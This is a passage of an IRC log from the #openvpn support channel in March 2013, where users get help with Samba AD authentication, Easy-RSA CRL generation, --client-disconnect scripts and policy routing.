see this server on the domain 12:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:48 <@dazo> TheWarden: did you successfully do: net ads join -U administrator ? 12:49 < TheWarden> dazo: ahh that would be from a windows workstation, I've never tried that but presently I'm authenticated to the domain via my workstation (Windows 7). 12:49 <@dazo> that should be run from the Linux box 12:49 -!- JSharpe [~JSharpe@46.165.208.207] has quit [Ping timeout: 245 seconds] 12:49 <@dazo> you want your Linux box to join the AD domain, to be able to do the further auths 12:49 < TheWarden> dazo: oh well there is no net command 12:50 <@dazo> It might be that this setup is for Samba 3 12:50 < TheWarden> so it is strange to have the server that is Samba 4 AD DC be joined to the domain, basically itself lol ? 12:50 <@dazo> ahhh! 12:50 -!- JSharpe [~JSharpe@ip5-63-144-28.lon.ukinetcom.net] has joined #openvpn 12:50 <@dazo> I thought you had a Windows AD DC running already, and wanted to join that AD domain 12:51 <@dazo> well, then .... why do you setup Samba at all then? 12:51 <@dazo> do you want to provide Samba over VPN? 12:51 < TheWarden> I have Samba 4 AD DC setup and working. I can authenticate to it from a Windows workstration. 12:51 <@dazo> okay ... that's an important missing detail here 12:52 <@dazo> then you don't need to care about winbind at all 12:52 < TheWarden> I can see the users and computers that are joined to the domain. However the Linux Server itself that has Samba 4 is not showning up on the domain. 12:52 <@dazo> well, that sounds more like the smbd and nmbd daemons isn't running 12:52 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 12:53 <@dazo> but that's not a topic for this channel .... Last time I configured Samba for file services was many years ago ... and for DC role, even longer ago 12:53 <@dazo> But for OpenVPN to work ... then you just need pure auth-pam 12:53 < TheWarden> mm okay, well either way I have to follow these steps http://www.skelleton.net/2012/08/03/joining-a-debian-server-to-active-directory/ to join other servers to the domain correct? 12:53 <@vpnHelper> Title: Joining a Debian Server to Active Directory | skelleton.net (at www.skelleton.net) 12:53 <@dazo> yes, that makes sense 12:53 < TheWarden> ahh okay, I'll move this to #samba then 12:54 < TheWarden> I'll fix that and then try to figure out how to get this auth-pam to work for OpenVPN to auth against the active directory. 12:55 <@dazo> TheWarden: when you can from one of your other boxes authenticate and login using a AD account ... then you can start to look at auth-pam 12:55 <@dazo> but not before 12:55 <@dazo> auth-pam expects a functional PAM auth 12:55 < TheWarden> dazo: I can do that now. I just have an issue it appears like you were saying that the server with Samba 4 AC DC is not showing up on the domain itself. 12:56 <@dazo> okay, sort that out in #samba first ... just to ensure you have everything set up properly 12:57 <@dazo> (debugging issues when you believe your dependencies are working ... makes it even harder to find errors ... you need to know dependencies are working 100% correctly first) 12:59 < TheWarden> its okay 12:59 < TheWarden> found the server, it was me not thinking right. the server shows up under domain controllers. makes sense. 12:59 < TheWarden> so on with auth-pam some how 13:02 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 13:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wqqijxjunhrhjfkd] has joined #openvpn 13:05 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 13:18 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn 13:19 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-jabwfdwwnubynxqd] has quit [Ping timeout: 245 seconds] 13:27 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wqqijxjunhrhjfkd] has quit [Ping timeout: 276 seconds] 13:27 -!- paccer [uid4847@gateway/web/irccloud.com/x-yfkfkdnmzaewasrg] has quit [Ping timeout: 276 seconds] 13:27 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-otyxzvbrmvapfvtz] has quit [Ping timeout: 252 seconds] 13:27 -!- lmm [uid6417@gateway/web/irccloud.com/x-hunjxwmdptpgcgmf] has quit [Ping timeout: 245 seconds] 13:33 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 248 seconds] 13:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-gfejrjxrugpiqdyx] has joined #openvpn 13:37 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-zxcgkocqnpwnljgq] has joined #openvpn 13:48 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 13:48 -!- lmm [uid6417@gateway/web/irccloud.com/x-urrxqdulhckrxfpt] has joined #openvpn 13:48 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds] 13:57 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:09 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has quit [Ping timeout: 258 seconds] 14:17 -!- dzubey [~dzubey@68.14.254.195] has joined #openvpn 14:19 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 14:19 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 14:21 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 14:21 -!- master_of_master [~master_of@p4FF2446B.dip.t-dialin.net] has joined #openvpn 14:22 < TheWarden> Where can I find definition of keywords in the server.conf? like tls-server or management or ccd-exclusive 14:23 -!- master_o1_master [~master_of@p4FF24F8F.dip.t-dialin.net] has quit [Read error: Operation timed out] 14:25 <@ecrist> !man 14:25 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 14:35 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:47 < TheWarden> how do I generate a file for crl-verify? 14:48 -!- dazo is now known as dazo_afk 14:51 < pekster> TheWarden: Are you using Easy-RSA? If so, when you perform the "revoke-full" command it'll update your CRL file in the process 14:52 < TheWarden> pekster: yes I'm using easy-rsa 14:52 < TheWarden> pekster: so to set it up to use a crl-verify I run that command without a common name? 14:52 < pekster> Oh, no, that command requires something to revoke 14:52 < TheWarden> pekster: oh so its okay if I don't have a crl file initially until its required to revoke a key? 14:53 < pekster> Yea, I'm looking at the 2.0 Easy-RSA, and it doesn't appear to support generating a blank CRL with a nice frontend command :\ 14:53 < TheWarden> so is what I said true then? 14:53 < pekster> The new Easy-RSA 3.x stuff I'm working on lets you do that, but I just released the first prototype version today, so it's not something you want to use unless you're willing to run unstable code 14:53 < pekster> Well, you can do it by hand with openssl 14:54 < pekster> Something like this, assuming you're in the dir with all the command files and openssl.cnf: 14:54 < TheWarden> oh so my statement is not true. 14:54 < pekster> openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem 14:54 < pekster> I think 14:55 <@ecrist> !factoids search crl 14:55 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that 14:55 <@vpnHelper> will create the CRL file for you. ssl-admin will also build a crl for you 14:56 <@ecrist> pekster: that command is correct 14:56 < pekster> Hmm, at closer inspection, looks like you can call that without any arguments TheWarden. It'll spit some errors when it fails to find a cert to revoke, but it "should" play nice with the CRL generation, I believe 14:56 <@ecrist> !learn crl as openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem 14:56 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 14:57 <@ecrist> fuck you, vpnHelper 14:57 < pekster> ecrist: Yea, I just forgot offhand how the relative dir references worked with Easy-RSA 2.x. I'm already on 3.x mode today :) 14:57 < pekster> !learn crl as openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem 14:57 <@vpnHelper> Joo got it. 14:57 < pekster> I got annoyed with this one recently: 14:57 < pekster> !log 14:57 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 14:57 < TheWarden> so easy-rsa or opeenssl 14:57 < pekster> !factoids whatis log 14:57 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging 14:57 -!- master_o1_master [~master_of@p4FF24CAD.dip.t-dialin.net] has joined #openvpn 14:58 < pekster> TheWarden: Right. Easy-RSA is just a frontend to openssl. openssl is a non-trivial tool to use to the uniniated, and even to those of us who know some of it's oddities, openssl gives awful error messages 14:58 < pekster> its* 14:58 < TheWarden> mmm 14:59 < pekster> Easy-RSA 2.x has some usability issues too (like the lack of crl update without revoke you pointed out.) We're working to change that, but current code is tested to the extent I've been able to in the last few days, much of it between 11PM and 2AM last night. You're free to send me bugreports and errors though ;) 14:59 < pekster> Otherwise, just try "revoke-full" without parameters and see what happens 14:59 < pekster> I think you'll get a "keys/crl.pem" file 15:00 < TheWarden> pekster: I tried that and I get usage: revoke-full 15:00 < pekster> Oh. Right. Feed it something bogus 15:00 < pekster> Not a real cert of it'll revoke it 15:00 < TheWarden> really... ok 15:01 < pekster> ecrist: Yup. it was clearly high time for a replacement. While my prototype code is minimally tested/debugged, it does this right :P 15:01 -!- master_of_master [~master_of@p4FF2446B.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 15:01 < TheWarden> ./revoke-full foo 15:01 < TheWarden> Please source the vars script first (i.e. "source ./vars") 15:01 < TheWarden> Make sure you have edited it to reflect your configuration. 15:01 < pekster> Right, you need vars sourced in any terminal you wish to use Easy-RSA from 15:02 < pekster> If you're coming back to an existing PKI you've set up before with Easy-RSA, just do "source ./vars" before you use commands 15:03 < TheWarden> pekster: ahh what if you ran ./vars already? 15:03 < TheWarden> as I'm doing this for an existing PKI 15:03 < pekster> It just exports env-vars. It's safe to call that as many times as you'd like 15:03 < pekster> But it is an error to use Easy-RSA commands without sourcing it at least once ;) 15:04 < TheWarden> okay so I did source ./vars then now revoke-all 15:04 < pekster> Yea, it'll spit at leaest one error if "foo.crt" doesn't exist, but it should generate the CRL afterwords fine 15:05 < pekster> Then it'll spit some more crap as it tries to verify a non-existant cert :P 15:05 < TheWarden> yes it did but it created crl.pem for me. 15:05 < pekster> There ya go 15:05 < TheWarden> so now I'll copy that to /etc/openvpn 15:05 < pekster> I promise this will get easier when we get the new hotness put into the official releases 15:07 < pekster> In the future, you'll never need to update that crl unless you have a cert you need to revoke beofre it expires (eg: compromised access, user no longer allowed in, etc.) With --verify-crl on the server, it'll become live hte moment you replace the CRL file, although only checked for new connections or TLS re-keys 15:07 < pekster> It is a good idea to do what you're doing, since otherwise adding a --verify-crl to the config requires a server restart (may not be desirable if other people are using it) 15:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:13 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 15:22 -!- Harty [~Hart@AAubervilliers-151-1-49-31.w83-114.abo.wanadoo.fr] has joined #openvpn 15:26 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wkuxkpkoldxkvqtz] has joined #openvpn 15:29 -!- paccer [uid4847@gateway/web/irccloud.com/x-hpjsylhuzdlmuipv] has joined #openvpn 15:34 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:38 < TheWarden> what does this mean? Options error: --auth-user-pass-verify script fails with '/etc/openvpn/scripts/auth_kerberos.sh': Permission denied 15:38 < TheWarden> I verified that the script is present 15:39 < pekster> Permissions issue calling the script, or possibly from the script itself. Likely an issue with downgraded user privs 15:40 < TheWarden> pekster: this is what I have, -rw-r--r-- 1 root root 1777 Mar 13 14:20 auth_kerberos.sh 15:41 < pekster> You cannot execute things that are not executable 15:41 < TheWarden> oh man I can't believe I didn't see tat 15:41 < TheWarden> that 15:41 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 15:41 <@EugeneKay> Don't tell me what I can't do 15:41 <@EugeneKay> You're not my real mom! 15:41 < pekster> EugeneKay can apparently do that. He can probably also fly if he jumps off a bridge ;) 15:42 <@EugeneKay> I am at an airport 15:42 < pekster> s/bridge/control tower/ 15:44 <@EugeneKay> I think I shall fold up the laptop and go back to the bar 15:45 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 15:50 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 276 seconds] 15:51 -!- mustu [~maan@119.63.130.93] has joined #openvpn 15:52 -!- mustu is now known as Guest69565 16:01 < dzubey> okay, i guess I need to ask for help. 16:01 <+[oc80z]> hehe att'a b. 16:02 < dzubey> I got a script that's called by --learn-address, and the script adds and removes host names from dns. works great... 16:02 < dzubey> ..except --learn-address doesn't set the common_name of the connecting client when it's deleting. 16:03 < dzubey> soo...any way I can get the server to tell the script that it's deleting a client, and what the common name that's getting deleted is? 16:03 < dzubey> ..please? 16:04 <+[oc80z]> what string is common_name? from certificates? 16:04 < dzubey> yea. 16:04 <+[oc80z]> from the client's identifiable 'common_name' 16:05 <+[oc80z]> --learn-address cmd : Run script cmd to validate client virtual addresses. 16:05 -!- brute11k [~brute@89.249.235.131] has quit [Quit: Leaving.] 16:05 <+[oc80z]> here is from 2004: http://openvpn.net/archive/openvpn-users/2004-06/msg00338.html 16:05 <@vpnHelper> Title: [Openvpn-users] --learn-address cmd ?? (at openvpn.net) 16:05 < dzubey> right. I'm using that successfully for adds and updates. 16:06 <+[oc80z]> [3] common name -- The common name on the certificate associated with the client linked to this address. Only present for "add" or "update" operations, not "delete". 16:06 < dzubey> yep. delete doesn't include the common_name. Hence my problem :) 16:07 <+[oc80z]> does the delete work? 16:07 <+[oc80z]> could you just match the delete with the previous common_name? 16:07 < dzubey> The script gets called for delete, yes. 16:08 -!- mezgani [~mezgani@41.140.2.243] has joined #openvpn 16:09 < dzubey> I've tried several things..i've parsed the status file for the client's info. That doesn't work if the client is on another server, where that server is connected as a client. 16:10 < dzubey> I've stopped myself from creating a mysql database to record the addresses/hostnames for the script, since DNS is a database that's supposed to record that anyways 16:10 <+[oc80z]> did you read the next thread answer 16:10 <+[oc80z]> James reply'd: http://openvpn.net/archive/openvpn-users/2004-06/msg00365.html 16:10 < dzubey> just a sec 16:10 <@vpnHelper> Title: Re: [Openvpn-users] --learn-address cmd ?? (at openvpn.net) 16:11 -!- p3rror [~mezgani@41.249.96.133] has quit [Ping timeout: 258 seconds] 16:12 < dzubey> ..reading...permissions isn't a problem.. 16:12 < dzubey> ..still reading 16:12 * [oc80z] readin other stuff, ive not used this is a while+ 16:13 <+[oc80z]> this, re: events on client conn/dconn 16:15 < dzubey> maybe --down? 16:15 <+[oc80z]> that might be server only? 16:15 < dzubey> yea, this is all on the server. 16:15 < dzubey> so it's ok 16:15 <+[oc80z]> er... server-side only , when the server goes --down 16:16 < dzubey> oh..hmm 16:16 <+[oc80z]> double check , liek is aid, im not sure , it might be for that.. 16:17 < dzubey> no, that's the only time the tun/tap device closes, so you're right 16:17 <+[oc80z]> how is --learn-address 'called multiple times...' 16:18 < dzubey> from what i've observed, it's any time the learning mechanism in the server gets triggered. 16:18 <+[oc80z]> sure, yeah... i think the wording is misleading. 16:19 <+[oc80z]> can you change delete to update, and then change the ip to 0.0.0.0 , and then capture the common_name ? 16:20 < dzubey> you mean on the dns side? 16:20 <+[oc80z]> yeah, i guess... i mean.. if a client disconnects, does update ever trigger? 16:20 < dzubey> the script has to react to a delete from the server, the dns name has to go away when the client does. 16:21 < dzubey> oh i see what you mean 16:21 <+[oc80z]> yea, otherwise its stale/ghost 16:21 <+[oc80z]> or duplicate 16:21 < dzubey> no, it doesn't. I only get one call. 16:21 < TheWarden> I'm running wbinfo --group-info VPN to get a list of the users in the VPN group and all I get is this returned, VPN:*:3000025: 16:21 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:21 < TheWarden> there is no users listed at the end 16:24 < dzubey> well i'm stumped 16:24 < TheWarden> I don't get it, what would cause it not to return the list of users for that group? 16:25 < TheWarden> I even tried to do this, /usr/local/samba/bin/wbinfo --group-info="Domain Admins" and it only returns Domain Admins:*:3000008: 16:26 < TheWarden> I know there is users within these groups Domain Admins and VPN. 16:26 <+[oc80z]> dzubey may be the code does not touch any certificates 16:26 < TheWarden> Ops sorry wrong channel lol 16:26 <+[oc80z]> so theres nowhere for that disconnect function to point you to for that certificate info 16:27 <+[oc80z]> whereas, update and add, those certs are defintily passed in as a string for that event 16:27 <+[oc80z]> its confusing when you said the server as a client. 16:27 < dzubey> yea, there's probably a reason. 16:28 < pekster> Why not hook into --client-disconnect? 16:28 < dzubey> yea, i've got two linux machines, each with a openvpn server on it, and the're linked via a client connection. 16:28 < pekster> I missed some of the backlog there, but your goal is to run something when the client disconnects based on CN, right? 16:28 < dzubey> yea, delete a dns host 16:28 <+[oc80z]> [3] common name -- The common name on the certificate associated with the client linked to this address. Only present for "add" or "update" operations, not "delete". 16:28 < dzubey> i'm looking up --client-connect 16:29 < dzubey> ..disconnect. 16:29 <+[oc80z]> ok 16:29 < pekster> --client-disconnect /usr/local/sbin/dns_host_delete.sh 16:29 < pekster> or w/e 16:29 <+[oc80z]> TheWarden :P 16:29 < dzubey> that might do it..let me try 16:30 < pekster> --client-connect is probably a better spot to be hooking into the client connect anyway for that kind of stuff, not --learn-address. You get much more control over env-vars that way (not that you need them in your setup on connect, I guess) 16:30 < dzubey> the script is pretty flexible, so i can call it from anywhere 16:31 < pekster> Right, but --client-{connect,disconnect} use the conventional $common_name env-var 16:31 < pekster> No worrying about the argument being present during add/update but not delete tasks 16:32 < dzubey> ok 16:32 < pekster> I've got a sample of user accounting on disconnect here, showing potential use: 16:32 < pekster> !accounting 16:32 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 16:32 -!- Guest69565 [~maan@119.63.130.93] has quit [Ping timeout: 245 seconds] 16:33 < dzubey> yea, similar to what i have 16:33 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 16:34 < dzubey> thx. I'm going to restart the server and terrify about 20 people right now. Just a sec. 16:34 < pekster> Well, if it comes back up afterwords... :) 16:35 < pekster> Terrorizing them would be leaving it off, I'd think. 16:35 < dzubey> you don't understand..these guys get one packet delayed, there's screaming. 16:35 < dzubey> heh 16:38 <+[oc80z]> tell them to reset their windows firewall to defaults. 16:38 <+[oc80z]> no, heh.. 16:38 <+[oc80z]> that would be criminal. 16:39 < hazardous> hi [oc80z] 16:39 < hazardous> is that a drug reference :o 16:39 <+[oc80z]> no 16:40 <+[oc80z]> ye 16:40 <+[oc80z]> i plead the 5th 16:41 < Harty> Hi, is this possible to use OpenVPN only for some ports or software ? 16:42 < hazardous> you can use it for some ips? 16:42 < pekster> Harty: At an OS level that would require setting up policy routing 16:44 < Harty> hum ok thx 16:44 < pekster> Optionally if your application is SOCKS-aware, just define a proxy in its application settings and set up a proxy at the other end of the tunnel. I do this with my browser and a VPN at my cloud VM when I need external access 16:45 < Harty> i can define proxy on my soft, but actually i'm using a Free OpenVPN server for test 16:45 < hazardous> pekster: any chance you can recommend some way i can force non proxy aware applications through a proxy? 16:46 < dzubey> transparent proxy via squid? 16:47 < Harty> i can't control the openvpn server, and that's why i'm trying to use some table in the VPNConf 16:48 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn [] 16:48 < pekster> Harty: you can do policy routing, but you need routing tables and rules to sort your traffic 16:49 < Harty> actually, i'm lookin in the Windows Firewall config, and i can choose the interfaces for my protocol or port 16:49 < pekster> A Windows client won't do what you want, not unless you're running IAS server or something 16:50 < pekster> You need to take routing action based on definable connection characteristics 16:51 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:53 <+[oc80z]> yeah 16:54 < Harty> ok so i think i will use a VM for my VPN :| 16:54 < pekster> For an OS that'll cost you $0, it'll so much more 16:54 < pekster> do* 16:55 < Harty> ? 16:55 < pekster> Oh, unless you mean a Windows VM :( 16:55 < Harty> any OS 16:55 < rob0> Policy routing might be possible on Windows, but no one outside of Redmond will know how to do it. 16:55 < Harty> will try on a MAC ;) 16:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:02 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 17:03 < dzubey> I just got an SMS 17:03 < dzubey> "SHIT AINT WORKING" 17:03 < dzubey> *sigh* 17:04 <@ecrist> heh 17:07 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 17:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 17:11 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:13 < Harty> pekster what's the differences between policy routing and the Windows hosts file ? 17:16 <+[oc80z]> dzubey hahaahah 17:18 < pekster> Harty: many things. hosts is a way to short-circuit getHostByName() calls that would have gone to DNS, while policy routing is a framework for making routing decisions 17:18 < pekster> !101 17:18 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 17:23 < Harty> but can i use policy routing to force port on network interface ? ifnot this is no help for me, and google isn't helping much 17:28 <+[oc80z]> what 17:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 17:51 -!- Harty [~Hart@AAubervilliers-151-1-49-31.w83-114.abo.wanadoo.fr] has quit [Quit: Quitte] 17:58 < TheWarden> use to openvpn-plugin-auth-pam doesn't one just add to server.conf plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so login and then auth-user-pass-verify somescript ? 18:00 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 18:01 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 18:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 18:07 * TheWarden sighs 18:21 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 18:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:34 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 18:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:45 < TheWarden> good night everyone 18:45 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 258 seconds] 18:57 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Quit: No Ping reply in 180 seconds.] 18:58 -!- joako [~joako@opensuse/member/joak0] has joined #openvpn 18:58 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 18:58 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 19:02 -!- mezgani [~mezgani@41.140.2.243] has left #openvpn ["Leaving"] 19:15 -!- mustu [~maan@221.120.210.138] has joined #openvpn 19:16 -!- mustu is now known as Guest9264 19:16 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 19:18 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:20 -!- Guest9264 [~maan@221.120.210.138] has quit [Ping timeout: 260 seconds] 19:20 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 19:23 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 19:24 -!- ngharo_ is now known as ngharo 19:25 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 19:27 -!- JSharpe [~JSharpe@ip5-63-144-28.lon.ukinetcom.net] has quit [Quit: Leaving] 19:27 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 19:32 -!- mustu__ [~maan@221.120.210.138] has joined #openvpn 19:35 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 19:37 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 19:38 -!- mustu__ [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds] 19:45 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 19:50 -!- mustu__ [~maan@221.120.210.138] has joined #openvpn 19:50 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 19:51 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 19:52 -!- master_of_master [~master_of@p4FF24BF0.dip.t-dialin.net] has joined #openvpn 19:53 -!- mustu__ [~maan@221.120.210.138] has quit [Read error: Connection reset by peer] 19:55 -!- mustu_ [~maan@221.120.210.138] has joined #openvpn 19:56 -!- master_o1_master [~master_of@p4FF24CAD.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 20:00 -!- raidz is now known as raidz_away 20:01 -!- mustu__ [~maan@119.63.130.93] has joined #openvpn 20:01 -!- mustu_ [~maan@221.120.210.138] has quit [Read error: Connection reset by peer] 20:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:05 -!- mustu__ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 20:06 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 20:06 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:08 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 20:09 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 20:11 -!- mustu [~maan@119.63.130.93] has joined #openvpn 20:11 -!- mustu is now known as Guest52585 20:16 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 20:30 -!- mustu_ [~maan@221.120.210.138] has joined #openvpn 20:30 -!- Guest52585 [~maan@119.63.130.93] has quit [Read error: Connection reset by peer] 20:34 -!- mustu_ [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds] 20:35 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 20:37 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 272 seconds] 20:40 -!- mustu__ [~maan@119.63.130.93] has joined #openvpn 20:41 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 245 seconds] 20:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:45 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 20:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:47 -!- master_o1_master [~master_of@p4FF244AC.dip.t-dialin.net] has joined #openvpn 20:50 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 20:50 -!- master_of_master [~master_of@p4FF24BF0.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 20:56 -!- dzubey [~dzubey@68.14.254.195] has left #openvpn ["PING 1363226174"] 21:47 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 22:09 -!- ironmagma [~ironmagma@66-231-148-248.apt.gru.net] has joined #openvpn 22:13 < ironmagma> Hi there, I'm following the tutorial at https://help.ubuntu.com/community/OpenVPN and got to "Generating Client Certificate and Key", but when I run the third line I run into an error.. 22:13 <@vpnHelper> Title: OpenVPN - Community Ubuntu Documentation (at help.ubuntu.com) 22:14 < ironmagma> http://codepad.org/cSHjIjey is the terminal output. I'm not sure the meaning of everything I configured 22:14 <@vpnHelper> Title: Plain Text code - 22 lines - codepad (at codepad.org) 22:15 < ironmagma> i.e. what KEY_OU should have. assuming that probably isn't the cause for the error but figured it might be worth mentioning 22:16 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:19 < ironmagma> anyone know what causes the error or how to fix it? 22:37 < joako> ironmagma, Try to change the commonName to something else 22:46 < ironmagma> Thanks, that seemed to work. What should common name contain exactly? 22:47 < joako> Normally you put the fqdn but for OpenVPN it doesn´t really matter 23:00 -!- sanfran [~sanfran@185.3.135.34] has joined #openvpn 23:00 < sanfran> !welcome 23:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 23:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 23:11 -!- sanfran [~sanfran@185.3.135.34] has quit [Quit: leaving] 23:15 < hazardous> i dont think i've encountered a non tourist yet that called it san fran 23:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn --- Day changed Thu Mar 14 2013 00:04 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 258 seconds] 00:15 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 00:15 -!- ironmagma [~ironmagma@66-231-148-248.apt.gru.net] has quit [Ping timeout: 240 seconds] 00:35 -!- laner 